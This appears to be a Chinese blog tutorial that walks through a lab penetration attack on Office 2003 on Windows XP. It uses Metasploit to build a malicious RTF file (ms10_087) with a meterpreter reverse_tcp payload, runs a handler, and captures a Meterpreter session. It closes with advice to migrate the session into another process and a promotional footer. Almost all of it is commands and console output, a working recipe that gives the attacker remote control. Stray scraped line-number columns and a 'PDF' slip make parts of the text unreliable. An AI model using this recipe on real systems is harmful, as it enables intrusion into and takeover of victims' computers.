# 基于Word文件格式的渗透攻击
攻击机: Kali 192.168.175.128
靶机 WinXP 192.168.175.130
程序 Office 2003
# 生成Word文档
msfconsole
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
set FILENAME word.rtf
exploit
1
2
3
4
5
6
7
2
3
4
5
6
7
具体如下:
msf5 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > show options
Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (RHOST and RPORT settings will be ignored!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME word.rtf
FILENAME => word.rtf
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'word.rtf' file ...
[+] word.rtf stored at /root/.msf4/local/word.rtf
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
可以看到,在 /root/.msf4/local/目录下生成了word.rtf文件。
# 上传文件到靶机
在实际中,我们需要想办法将文件传到靶机上,这里,我就直接拷贝到靶机了
# 实施攻击
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
exploit
1
2
3
4
5
2
3
4
5
具体如下:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# 打开Word文件
在靶机上利用Office 2003打开PDF文件
# 查看获得的Meterpreter
在攻击机Kali上,我们看到MSF控制台中获得了Meterpreter权限。
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1431) at 2019-01-24 16:05:52 +0800
meterpreter >
1
2
3
4
5
6
7
2
3
4
5
6
7
最后,最好用migrate命令将当前会话进程绑定到系统的其他进程中。
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!
